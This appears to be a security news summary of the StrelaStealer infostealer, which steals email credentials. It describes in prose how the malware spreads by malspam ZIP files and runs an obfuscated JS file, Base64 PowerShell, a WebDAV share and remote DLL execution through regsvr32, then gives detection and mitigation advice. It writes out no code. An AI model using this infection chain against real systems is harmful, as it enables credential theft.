New Infostealer Malware StrelaStealer Targets Email Credentials
/ 4 min read
Quick take - StrelaStealer is a newly discovered infostealer malware that targets login credentials from popular email clients and is primarily disseminated through malspam campaigns featuring ZIP files that execute a JavaScript payload, employing various obfuscation techniques to evade detection and complicate analysis.
Fast Facts
- StrelaStealer Overview: A newly identified infostealer malware targeting login credentials from popular email clients, primarily spread through malspam campaigns with ZIP file attachments.
- Infection Process: The malware’s initial payload is a JavaScript file executed via
wscript.exe, which then runs a Base64-encoded PowerShell command to facilitate further malicious actions. - Obfuscation Techniques: The JS file employs heavy obfuscation, including lengthy object names and random properties, complicating detection and analysis efforts.
- Detection Recommendations: Strong auditing practices, monitoring of Windows process creation, and alerts for suspicious file executions and PowerShell commands are essential for identifying StrelaStealer activities.
- Mitigation Strategies: Recommendations include blocking exploited file types, user training, secure email gateways, limiting user privileges, regular software updates, and employing Advanced Endpoint Detection and Response (EDR) solutions.
StrelaStealer: A New Infostealer Malware
Overview of StrelaStealer
StrelaStealer is a newly identified infostealer malware that targets login credentials from widely used email clients. The malware is primarily spread through malspam campaigns, which often include ZIP files. When these ZIP files are opened, users typically find a JavaScript (JS) file, which serves as the initial payload for the malware infection.
The JS file is executed using wscript.exe, the default execution binary for JS files on most Windows systems. During its execution, the JS file spawns a child process and runs a Base64-encoded command via PowerShell. This decoded command triggers the execution of timeout.exe, introducing a one-second delay. Following the delay, cmd.exe is invoked to run net.exe, mapping a network path to a WebDAV share. Additionally, the command uses regsvr32.exe to register and execute a DLL file remotely, complicating detection efforts.
Evasion Techniques and Detection Challenges
The payload’s structure is characterized by variable declarations and execution parts that are heavily obfuscated. The JS file includes lengthy object names and random properties, posing significant challenges for manual analysis. Adversaries use long junk variables with random values to further obscure the malware’s function. When deobfuscated, the extracted text from the payload reveals PowerShell instructions. These tactics are not unique to StrelaStealer but are commonly used by various forms of malware to evade detection.
Recognizing the evasion techniques used by StrelaStealer is crucial for timely identification and response to malware threats. Strong auditing practices and relevant log generation are essential for effective detection of advanced malware behaviors. Key log sources for monitoring include Windows process creation with command-line auditing and Windows Sysmon. Security measures should involve enabling alerts for suspicious file execution using wscript or cscript, which can help detect the execution of scripting files. Alerts for potentially malicious PowerShell commandlets are also recommended.
Mitigation Strategies
Monitoring system network connections is imperative to detect unauthorized access and file execution. Any anomalous activity related to regsvr32.exe should be scrutinized to identify suspicious uses of this binary. Recommendations for mitigating risks associated with StrelaStealer include blocking potentially exploited file types, conducting regular user training, and configuring network policies to limit unauthorized connections.
Implementing a secure email gateway can significantly reduce risks from malspam emails. Limiting user privileges can prevent unauthorized software installation and execution. Regular updates of devices and software are necessary to patch vulnerabilities. Employing Advanced Endpoint Detection and Response (EDR) solutions can help identify suspicious activities related to script execution and binary downloads. Monitoring web browsing behavior is beneficial in preventing potential malware downloads from harmful sites.
To support effective threat analysis and detection, comprehensive logging and monitoring practices should be maintained. A recommended log retention policy of at least six months ensures sufficient data is available for incident investigation.
Original Source: Read the Full Article Here
